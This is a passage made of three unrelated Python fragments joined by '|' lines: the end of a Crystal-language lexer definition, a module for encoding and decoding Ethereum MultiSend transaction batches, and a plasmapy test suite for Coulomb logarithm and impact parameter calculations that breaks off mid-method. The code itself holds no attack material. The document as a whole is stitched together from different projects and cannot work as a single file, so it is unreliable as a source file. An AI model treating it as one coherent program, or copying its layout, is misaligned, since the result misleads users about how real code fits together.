            (r'::', Operator),
            include('strings'),
            # chars
            (r'\?(\\[MC]-)*'  # modifiers
             r'(\\([\\befnrtv#"\']|x[a-fA-F0-9]{1,2}|[0-7]{1,3})|\S)'
             r'(?!\w)',
             String.Char),
            (r'[A-Z][A-Z_]+\b', Name.Constant),
            # macro expansion
            (r'\{%', String.Interpol, 'in-macro-control'),
            (r'\{\{', String.Interpol, 'in-macro-expr'),
            # attributes
            (r'(@\[)(\s*)([A-Z]\w*)',
             bygroups(Operator, Text, Name.Decorator), 'in-attr'),
            # this is needed because Crystal attributes can look
            # like keywords (class) or like this: ` ?!?
            (words(CRYSTAL_OPERATORS, prefix=r'(\.|::)'),
             bygroups(Operator, Name.Operator)),
            (r'(\.|::)([a-zA-Z_]\w*[!?]?|[*%&^`~+\-/\[<>=])',
             bygroups(Operator, Name)),
            # Names can end with [!?] unless it's "!="
            (r'[a-zA-Z_]\w*(?:[!?](?!=))?', Name),
            (r'(\[|\]\??|\*\*|<=>?|>=|<<?|>>?|=~|===|'
             r'!~|&&?|\|\||\.{1,3})', Operator),
            (r'[-+/*%=<>&!^|~]=?', Operator),
            (r'[(){};,/?:\\]', Punctuation),
            (r'\s+', Text)
        ],
        'funcname': [
            (r'(?:([a-zA-Z_]\w*)(\.))?'
             r'([a-zA-Z_]\w*[!?]?|\*\*?|[-+]@?|'
             r'[/%&|^`~]|\[\]=?|<<|>>|<=?>|>=?|===?)',
             bygroups(Name.Class, Operator, Name.Function), '#pop'),
            default('#pop')
        ],
        'classname': [
            (r'[A-Z_]\w*', Name.Class),
            (r'(\()(\s*)([A-Z_]\w*)(\s*)(\))',
             bygroups(Punctuation, Text, Name.Class, Text, Punctuation)),
            default('#pop')
        ],
        'in-intp': [
            (r'\{', String.Interpol, '#push'),
            (r'\}', String.Interpol, '#pop'),
            include('root'),
        ],
        'string-intp': [
            (r'#\{', String.Interpol, 'in-intp'),
        ],
        'string-escaped': [
            (r'\\([\\befnstv#"\']|x[a-fA-F0-9]{1,2}|[0-7]{1,3})', String.Escape)
        ],
        'string-intp-escaped': [
            include('string-intp'),
            include('string-escaped'),
        ],
        'interpolated-regex': [
            include('string-intp'),
            (r'[\\#]', String.Regex),
            (r'[^\\#]+', String.Regex),
        ],
        'interpolated-string': [
            include('string-intp'),
            (r'[\\#]', String.Other),
            (r'[^\\#]+', String.Other),
        ],
        'multiline-regex': [
            include('string-intp'),
            (r'\\\\', String.Regex),
            (r'\\/', String.Regex),
            (r'[\\#]', String.Regex),
            (r'[^\\/#]+', String.Regex),
            (r'/[imsx]*', String.Regex, '#pop'),
        ],
        'end-part': [
            (r'.+', Comment.Preproc, '#pop')
        ],
        'in-macro-control': [
            (r'\{%', String.Interpol, '#push'),
            (r'%\}', String.Interpol, '#pop'),
            (r'for\b|in\b', Keyword),
            include('root'),
        ],
        'in-macro-expr': [
            (r'\{\{', String.Interpol, '#push'),
            (r'\}\}', String.Interpol, '#pop'),
            include('root'),
        ],
        'in-attr': [
            (r'\[', Operator, '#push'),
            (r'\]', Operator, '#pop'),
            include('root'),
        ],
    }
    # Merge in the generated string states at class-creation time.
    tokens.update(gen_crystalstrings_rules())
|
from enum import Enum
from logging import getLogger
from typing import List, Union
from eth_account.signers.local import LocalAccount
from hexbytes import HexBytes
from web3 import Web3
from gnosis.eth import EthereumClient
from gnosis.eth.contracts import get_multi_send_contract
from gnosis.eth.ethereum_client import EthereumTxSent
from gnosis.eth.typing import EthereumData
logger = getLogger(__name__)
class MultiSendOperation(Enum):
    """Kind of call a MultiSendTx performs, as encoded in the first byte."""
    CALL = 0           # plain CALL
    DELEGATE_CALL = 1  # DELEGATECALL
class MultiSendTx:
    """One transaction inside a MultiSend batch.

    Wire format (see encoded_data / from_bytes): 1-byte operation,
    20-byte address, 32-byte value, 32-byte data length, then the data.
    """

    def __init__(self, operation: MultiSendOperation, to: str, value: int, data: EthereumData):
        self.operation = operation
        self.to = to
        self.value = value
        # Normalize falsy data (None, empty) to empty bytes.
        self.data = HexBytes(data) if data else b''

    def __eq__(self, other):
        if not isinstance(other, MultiSendTx):
            return NotImplemented
        return ((self.operation, self.to, self.value, self.data)
                == (other.operation, other.to, other.value, other.data))

    def __len__(self):
        """
        :return: Size on bytes of the tx (85-byte fixed header + data)
        """
        return 21 + 32 * 2 + self.data_length

    def __str__(self):
        preview = self.data[:4].hex() + ('...' if len(self.data) > 4 else '')
        return f'MultisendTx operation={self.operation.name} to={self.to} value={self.value}' \
               f' data={preview}'

    @property
    def data_length(self) -> int:
        return len(self.data)

    @property
    def encoded_data(self):
        """Concatenation of the fixed-width header fields and the payload."""
        operation = HexBytes('{:0>2x}'.format(self.operation.value))   # Operation 1 byte
        to = HexBytes('{:0>40x}'.format(int(self.to, 16)))             # Address 20 bytes
        value = HexBytes('{:0>64x}'.format(self.value))                # Value 32 bytes
        data_length = HexBytes('{:0>64x}'.format(self.data_length))    # Data length 32 bytes
        return operation + to + value + data_length + self.data

    @classmethod
    def from_bytes(cls, encoded_multisend_tx: Union[str, bytes]) -> 'MultiSendTx':
        """
        Decodes one multisend transaction. If there's more data after `data` it's ignored. Structure:
        operation   -> MultiSendOperation 1 byte
        to          -> ethereum address   20 bytes
        value       -> tx value           32 bytes
        data_length -> 32 bytes
        data        -> `data_length` bytes
        :param encoded_multisend_tx: 1 multisend transaction encoded
        :return: Tx as a MultisendTx
        """
        raw = HexBytes(encoded_multisend_tx)
        operation = MultiSendOperation(raw[0])
        to = Web3.toChecksumAddress(raw[1:21])
        value = int.from_bytes(raw[21:53], byteorder='big')
        declared_length = int.from_bytes(raw[53:85], byteorder='big')
        data = raw[85:85 + declared_length]
        # A truncated payload means the encoding is corrupt.
        if declared_length != len(data):
            raise ValueError('Data length is different from len(data)')
        return cls(operation, to, value, data)
class MultiSend:
    """Helper around the MultiSend contract: decode batches and build
    the calldata for the multiSend function."""

    def __init__(self, address: str, ethereum_client: EthereumClient):
        assert Web3.isChecksumAddress(address), \
            '%s proxy factory address not valid' % address

        self.address = address
        self.ethereum_client = ethereum_client
        self.w3 = ethereum_client.w3

    @classmethod
    def from_bytes(cls, encoded_multisend_txs: Union[str, bytes]) -> List[MultiSendTx]:
        """
        Decodes one or more multisend transactions from `bytes transactions` (Abi decoded)
        :param encoded_multisend_txs:
        :return: List of MultiSendTxs
        """
        decoded_txs = []
        remaining = HexBytes(encoded_multisend_txs) if encoded_multisend_txs else b''
        # Peel one encoded tx off the front until nothing is left.
        while remaining:
            tx = MultiSendTx.from_bytes(remaining)
            tx_size = len(tx)
            assert tx_size > 0, 'Multisend tx cannot be empty'  # This should never happen, just in case
            decoded_txs.append(tx)
            remaining = remaining[tx_size:]
        return decoded_txs

    @classmethod
    def from_transaction_data(cls, multisend_data: Union[str, bytes]) -> List[MultiSendTx]:
        """
        Decodes multisend transactions from transaction data (ABI encoded with selector)
        :return: decoded txs, or [] when the data does not decode
        """
        try:
            _, decoded = get_multi_send_contract(Web3()).decode_function_input(multisend_data)
            return cls.from_bytes(decoded['transactions'])
        except ValueError:
            return []

    @staticmethod
    def deploy_contract(ethereum_client: EthereumClient, deployer_account: LocalAccount) -> EthereumTxSent:
        """
        Deploy proxy factory contract and wait for the receipt
        :param ethereum_client:
        :param deployer_account: Ethereum Account
        :return: deployed contract address
        """
        contract = get_multi_send_contract(ethereum_client.w3)
        deploy_tx = contract.constructor().buildTransaction({'from': deployer_account.address})
        tx_hash = ethereum_client.send_unsigned_transaction(deploy_tx,
                                                            private_key=deployer_account.key)
        receipt = ethereum_client.get_transaction_receipt(tx_hash, timeout=120)
        assert receipt
        assert receipt['status']
        deployed_address = receipt['contractAddress']
        logger.info("Deployed and initialized Proxy Factory Contract=%s by %s", deployed_address,
                    deployer_account.address)
        return EthereumTxSent(tx_hash, deploy_tx, deployed_address)

    def get_contract(self):
        return get_multi_send_contract(self.ethereum_client.w3, self.address)

    def build_tx_data(self, multi_send_txs: List[MultiSendTx]) -> bytes:
        """
        Txs don't need to be valid to get through
        :param multi_send_txs:
        :return: calldata for a multiSend call over the given txs
        """
        payload = b''.join(tx.encoded_data for tx in multi_send_txs)
        contract = self.get_contract()
        return contract.functions.multiSend(payload).buildTransaction(
            {'gas': 1, 'gasPrice': 1})['data']
|
import numpy as np
import pytest
from astropy import units as u
from astropy.constants import c
from astropy.tests.helper import assert_quantity_allclose
import plasmapy.particles.exceptions
from plasmapy.formulary.braginskii import Coulomb_logarithm
from plasmapy.formulary.collisions import (
Knudsen_number,
Spitzer_resistivity,
collision_frequency,
coupling_parameter,
fundamental_electron_collision_freq,
fundamental_ion_collision_freq,
impact_parameter,
impact_parameter_perp,
mean_free_path,
mobility,
)
from plasmapy.utils import exceptions
from plasmapy.utils.exceptions import CouplingWarning
from plasmapy.utils.pytest_helpers import assert_can_handle_nparray
class Test_Coulomb_logarithm:
    """Regression tests for `Coulomb_logarithm`: textbook (Chen) examples,
    the GMS-1..GMS-6 method variants of Gericke, Murillo & Schlanges
    PRE (2002), and error/warning handling."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.temperature1 = 10 * 11604 * u.K
        self.T_arr = np.array([1, 2]) * u.eV
        self.density1 = 1e20 * u.cm ** -3
        self.n_arr = np.array([1e20, 2e20]) * u.cm ** -3
        self.temperature2 = 1 * 11604 * u.K
        self.density2 = 1e23 * u.cm ** -3
        self.z_mean = 2.5
        self.particles = ("e", "p")
        # Regression reference values for each GMS method variant; the
        # *_negative entries exercise the strongly-coupled regime where the
        # classical Coulomb logarithm would go negative.
        self.gms1 = 3.4014290066940966
        self.gms1_negative = -3.4310536971592493
        self.gms2 = 3.6349941014645157
        self.gms2_negative = -1.379394033464292
        self.gms3 = 3.4014290066940966
        self.gms3_negative = 2
        self.gms3_non_scalar = (2, 2)
        self.gms4 = 3.401983996820073
        self.gms4_negative = 0.0005230791851781715
        self.gms5 = 3.7196690506837693
        self.gms5_negative = 0.03126832674323108
        self.gms6 = 3.635342040477818
        self.gms6_negative = 0.030720859361047514

    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    @pytest.mark.parametrize(
        "kwargs",
        [
            {"method": "classical"},
            {"method": "GMS-1"},
            {"method": "GMS-2", "z_mean": 1.0},
            {"method": "GMS-3"},
            {"method": "GMS-4"},
            {"method": "GMS-5", "z_mean": 1.0},
            {"method": "GMS-6", "z_mean": 1.0},
        ],
    )
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans, kwargs):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(
            Coulomb_logarithm, insert_some_nans, insert_all_nans, kwargs
        )

    def test_unknown_method(self):
        """Test that function will raise ValueError on non-existent method"""
        with pytest.raises(ValueError):
            Coulomb_logarithm(
                self.T_arr[0],
                self.n_arr[0],
                self.particles,
                method="welcome our new microsoft overlords",
            )

    def test_handle_invalid_V(self):
        """Test that V default, V = None, and V = np.nan all give the same result"""
        with pytest.warns(CouplingWarning):
            methodVal_0 = Coulomb_logarithm(
                self.T_arr[0],
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
            )
            methodVal_1 = Coulomb_logarithm(
                self.T_arr[0],
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
                V=None,
            )
            methodVal_2 = Coulomb_logarithm(
                self.T_arr[0],
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
            )
        assert_quantity_allclose(methodVal_0, methodVal_1)
        assert_quantity_allclose(methodVal_0, methodVal_2)

    def test_handle_zero_V(self):
        """Test that V == 0 returns a PhysicsError"""
        with pytest.raises(exceptions.PhysicsError):
            Coulomb_logarithm(
                self.T_arr[0],
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
                V=0 * u.m / u.s,
            )

    def test_handle_V_arraysizes(self):
        """Test that different sized V input array gets handled by _boilerplate"""
        with pytest.warns(CouplingWarning):
            methodVal_0 = Coulomb_logarithm(
                self.T_arr[0],
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
                V=np.array([np.nan, 3e7]) * u.m / u.s,
            )
            methodVal_1 = Coulomb_logarithm(
                self.T_arr[1],
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
                V=np.array([1e7, np.nan]) * u.m / u.s,
            )
            methodVal_2 = Coulomb_logarithm(
                self.T_arr,
                self.n_arr[0],
                self.particles,
                z_mean=1 * u.dimensionless_unscaled,
                V=np.array([np.nan, np.nan]) * u.m / u.s,
            )
        # Only the NaN-velocity elements should match the all-NaN baseline
        assert_quantity_allclose(methodVal_0[0], methodVal_2[0])
        assert_quantity_allclose(methodVal_1[1], methodVal_2[1])

    def test_symmetry(self):
        # The Coulomb logarithm must be invariant under particle-order swap
        with pytest.warns(CouplingWarning):
            lnLambda = Coulomb_logarithm(
                self.temperature1, self.density2, self.particles
            )
            lnLambdaRev = Coulomb_logarithm(
                self.temperature1, self.density2, self.particles[::-1]
            )
        assert lnLambda == lnLambdaRev

    def test_Chen_Q_machine(self):
        """
        Tests whether Coulomb logarithm gives value consistent with
        Chen's Introduction to Plasma Physics and Controlled Fusion
        section 5.6.2 Q-machine example.
        """
        T = 0.2 * u.eV
        T = T.to(u.K, equivalencies=u.temperature_energy())
        n = 1e15 * u.m ** -3
        # factor of np.log(2) corrects for different definitions of thermal
        # velocity. Chen uses v**2 = k * T / m whereas we use
        # v ** 2 = 2 * k * T / m
        lnLambdaChen = 9.1 + np.log(2)
        lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
        testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
        errStr = (
            "Q-machine value of Coulomb logarithm should be "
            f"{lnLambdaChen} and not {lnLambda}."
        )
        assert testTrue, errStr

    def test_Chen_lab(self):
        """
        Tests whether Coulomb logarithm gives value consistent with
        Chen's Introduction to Plasma Physics and Controlled Fusion
        section 5.6.2 lab plasma example.
        """
        T = 2 * u.eV
        T = T.to(u.K, equivalencies=u.temperature_energy())
        n = 1e17 * u.m ** -3
        # factor of np.log(2) corrects for different definitions of thermal
        # velocity. Chen uses v**2 = k * T / m whereas we use
        # v ** 2 = 2 * k * T / m
        lnLambdaChen = 10.2 + np.log(2)
        lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
        testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
        errStr = (
            "Lab plasma value of Coulomb logarithm should be "
            f"{lnLambdaChen} and not {lnLambda}."
        )
        assert testTrue, errStr

    def test_Chen_torus(self):
        """
        Tests whether Coulomb logarithm gives value consistent with
        Chen's Introduction to Plasma Physics and Controlled Fusion
        section 5.6.2 torus example.
        """
        T = 100 * u.eV
        T = T.to(u.K, equivalencies=u.temperature_energy())
        n = 1e19 * u.m ** -3
        # factor of np.log(2) corrects for different definitions of thermal
        # velocity. Chen uses v**2 = k * T / m whereas we use
        # v ** 2 = 2 * k * T / m
        lnLambdaChen = 13.7 + np.log(2)
        lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
        testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
        errStr = (
            "Torus value of Coulomb logarithm should be "
            f"{lnLambdaChen} and not {lnLambda}."
        )
        assert testTrue, errStr

    def test_Chen_fusion(self):
        """
        Tests whether Coulomb logarithm gives value consistent with
        Chen's Introduction to Plasma Physics and Controlled Fusion
        section 5.6.2 fusion reactor example.
        """
        T = 1e4 * u.eV
        T = T.to(u.K, equivalencies=u.temperature_energy())
        n = 1e21 * u.m ** -3
        # factor of np.log(2) corrects for different definitions of thermal
        # velocity. Chen uses v**2 = k * T / m whereas we use
        # v ** 2 = 2 * k * T / m
        lnLambdaChen = 16 + np.log(2)
        # High temperature: thermal speeds are relativistic here
        with pytest.warns(exceptions.RelativityWarning):
            lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
        testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
        errStr = (
            "Fusion reactor value of Coulomb logarithm should be "
            f"{lnLambdaChen} and not {lnLambda}."
        )
        assert testTrue, errStr

    def test_Chen_laser(self):
        """
        Tests whether Coulomb logarithm gives value consistent with
        Chen's Introduction to Plasma Physics and Controlled Fusion
        section 5.6.2 laser plasma example.
        """
        T = 1e3 * u.eV
        T = T.to(u.K, equivalencies=u.temperature_energy())
        n = 1e27 * u.m ** -3
        # factor of np.log(2) corrects for different definitions of thermal
        # velocity. Chen uses v**2 = k * T / m whereas we use
        # v ** 2 = 2 * k * T / m
        lnLambdaChen = 6.8 + np.log(2)
        with pytest.warns(exceptions.RelativityWarning):
            lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
        testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
        errStr = (
            "Laser plasma value of Coulomb logarithm should be "
            f"{lnLambdaChen} and not {lnLambda}."
        )
        assert testTrue, errStr

    def test_GMS1(self):
        """
        Test for first version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature1,
                self.density1,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="GMS-1",
            )
        testTrue = np.isclose(methodVal, self.gms1, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-1 should be "
            f"{self.gms1} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS1_negative(self):
        """
        Test for first version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks for when
        a negative (invalid) Coulomb logarithm is returned.
        """
        with pytest.warns(exceptions.CouplingWarning, match="relies on weak coupling"):
            Coulomb_logarithm(
                self.temperature2,
                self.density2,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="GMS-1",
            )

    def test_GMS2(self):
        """
        Test for second version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature1,
                self.density1,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-2",
            )
        testTrue = np.isclose(methodVal, self.gms2, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-2 should be "
            f"{self.gms2} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS2_negative(self):
        """
        Test for second version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks for when
        a negative (invalid) Coulomb logarithm is returned.
        """
        # Only the warning is checked; the return value is intentionally unused
        with pytest.warns(exceptions.CouplingWarning, match="relies on weak coupling"):
            methodVal = Coulomb_logarithm(
                self.temperature2,
                self.density2,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-2",
            )

    def test_GMS3(self):
        """
        Test for third version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature1,
                self.density1,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-3",
            )
        testTrue = np.isclose(methodVal, self.gms3, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-3 should be "
            f"{self.gms3} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS3_negative(self):
        """
        Test for third version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks whether
        a positive value is returned whereas the classical Coulomb
        logarithm would return a negative value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature2,
                self.density2,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-3",
            )
        testTrue = np.isclose(methodVal, self.gms3_negative, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-3 should be "
            f"{self.gms3_negative} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS3_non_scalar_density(self):
        """
        Test for third version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks whether
        passing in a collection of density values returns a
        collection of Coulomb logarithm values.
        """
        # NOTE(review): temperature here is 10 * 1160 K, not 10 * 11604 K as
        # used elsewhere in this class -- confirm this is intentional
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                10 * 1160 * u.K,
                (1e23 * u.cm ** -3, 1e20 * u.cm ** -3),
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-3",
            )
        testTrue = np.isclose(methodVal, self.gms3_non_scalar, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-3 should be "
            f"{self.gms3_non_scalar} and not {methodVal}."
        )
        assert testTrue.all(), errStr

    def test_GMS4(self):
        """
        Test for fourth version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature1,
                self.density1,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-4",
            )
        testTrue = np.isclose(methodVal, self.gms4, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-4 should be "
            f"{self.gms4} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS4_negative(self):
        """
        Test for fourth version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks whether
        a positive value is returned whereas the classical Coulomb
        logarithm would return a negative value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature2,
                self.density2,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-4",
            )
        testTrue = np.isclose(methodVal, self.gms4_negative, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-4 should be "
            f"{self.gms4_negative} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS5(self):
        """
        Test for fifth version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature1,
                self.density1,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-5",
            )
        testTrue = np.isclose(methodVal, self.gms5, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-5 should be "
            f"{self.gms5} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS5_negative(self):
        """
        Test for fifth version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks whether
        a positive value is returned whereas the classical Coulomb
        logarithm would return a negative value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature2,
                self.density2,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-5",
            )
        testTrue = np.isclose(methodVal, self.gms5_negative, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-5 should be "
            f"{self.gms5_negative} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS6(self):
        """
        Test for sixth version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature1,
                self.density1,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-6",
            )
        testTrue = np.isclose(methodVal, self.gms6, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-6 should be "
            f"{self.gms6} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS6_negative(self):
        """
        Test for sixth version of Coulomb logarithm from Gericke,
        Murillo, and Schlanges PRE (2002). This checks whether
        a positive value is returned whereas the classical Coulomb
        logarithm would return a negative value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Coulomb_logarithm(
                self.temperature2,
                self.density2,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="GMS-6",
            )
        testTrue = np.isclose(methodVal, self.gms6_negative, rtol=1e-6, atol=0.0)
        errStr = (
            f"Coulomb logarithm for GMS-6 should be "
            f"{self.gms6_negative} and not {methodVal}."
        )
        assert testTrue, errStr

    def test_GMS2_zmean_error(self):
        """
        Tests whether GMS-2 raises z_mean error when a z_mean is not
        provided.
        """
        with pytest.raises(ValueError):
            methodVal = Coulomb_logarithm(
                self.temperature2, self.density2, self.particles, method="GMS-2"
            )

    def test_GMS5_zmean_error(self):
        """
        Tests whether GMS-5 raises z_mean error when a z_mean is not
        provided.
        """
        with pytest.raises(ValueError):
            methodVal = Coulomb_logarithm(
                self.temperature2, self.density2, self.particles, method="GMS-5"
            )

    def test_GMS6_zmean_error(self):
        """
        Tests whether GMS-6 raises z_mean error when a z_mean is not
        provided.
        """
        with pytest.raises(ValueError):
            methodVal = Coulomb_logarithm(
                self.temperature2, self.density2, self.particles, method="GMS-6"
            )

    def test_relativity_warn(self):
        """Tests whether relativity warning is raised at high velocity."""
        with pytest.warns(exceptions.RelativityWarning):
            Coulomb_logarithm(1e5 * u.K, 1 * u.m ** -3, ("e", "p"), V=0.9 * c)

    def test_relativity_error(self):
        """Tests whether relativity error is raised at light speed."""
        with pytest.raises(exceptions.RelativityError):
            Coulomb_logarithm(1e5 * u.K, 1 * u.m ** -3, ("e", "p"), V=1.1 * c)

    def test_unit_conversion_error(self):
        """
        Tests whether unit conversion error is raised when arguments
        are given with incorrect units.
        """
        # grams are not convertible to a temperature
        with pytest.raises(u.UnitTypeError):
            Coulomb_logarithm(
                1e5 * u.g, 1 * u.m ** -3, ("e", "p"), V=29979245 * u.m / u.s
            )

    def test_single_particle_error(self):
        """
        Tests whether an error is raised if only a single particle is given.
        """
        with pytest.raises(ValueError):
            Coulomb_logarithm(1 * u.K, 5 * u.m ** -3, "e")

    def test_invalid_particle_error(self):
        """
        Tests whether an error is raised when an invalid particle name
        is given.
        """
        with pytest.raises(plasmapy.particles.exceptions.InvalidParticleError):
            Coulomb_logarithm(1 * u.K, 5 * u.m ** -3, ("e", "g"))
# Module-level reference data: sample electron densities/temperatures and the
# corresponding expected Coulomb-logarithm values. Presumably consumed by
# tests further down the file -- TODO confirm usage (not visible from here).
n_e = np.array([1e9, 1e9, 1e24]) * u.cm ** -3
T = np.array([1e2, 1e7, 1e8]) * u.K
Lambda = np.array([5.97, 21.66, 6.69])
particles = ("e", "p")
class Test_impact_parameter_perp:
    """Tests for `impact_parameter_perp` (distance of closest approach for a
    90-degree Coulomb collision)."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.T = 11604 * u.K
        self.particles = ("e", "p")
        self.V = 1e4 * u.km / u.s
        # Expected SI value (regression constant)
        self.True1 = 7.200146594293746e-10

    def test_symmetry(self):
        # Result must be invariant under particle-order swap
        result = impact_parameter_perp(self.T, self.particles)
        resultRev = impact_parameter_perp(self.T, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """
        Test for known value.
        """
        methodVal = impact_parameter_perp(self.T, self.particles, V=np.nan * u.m / u.s)
        testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = (
            "Distance of closest approach for 90 degree Coulomb "
            f"collision, impact_parameter_perp, should be {self.True1} and "
            f"not {methodVal}."
        )
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 + 1e-15
        methodVal = impact_parameter_perp(self.T, self.particles, V=np.nan * u.m / u.s)
        testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"impact_parameter_perp value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(
            impact_parameter_perp, insert_some_nans, insert_all_nans, {}
        )

    # NOTE(review): this assert executes at class-definition (import) time,
    # not as a collected test. It sanity-checks the 1 eV <-> 11604.5220 K
    # temperature equivalence -- presumably intentional; confirm.
    assert np.isclose(
        Coulomb_logarithm(1 * u.eV, 5 * u.m ** -3, ("e", "e")),
        Coulomb_logarithm(11604.5220 * u.K, 5 * u.m ** -3, ("e", "e")),
    )
class Test_impact_parameter:
    """Tests for `impact_parameter`, which returns the (bmin, bmax) pair of
    collision impact parameters."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.T = 11604 * u.K
        self.T_arr = np.array([1, 2]) * u.eV
        self.n_e = 1e17 * u.cm ** -3
        self.n_e_arr = np.array([1e17, 2e17]) * u.cm ** -3
        self.particles = ("e", "p")
        self.z_mean = 2.5
        self.V = 1e4 * u.km / u.s
        # Expected (bmin, bmax) SI values (regression constants)
        self.True1 = np.array([7.200146594293746e-10, 2.3507660003984624e-08])

    def test_symmetry(self):
        # (bmin, bmax) must be invariant under particle-order swap
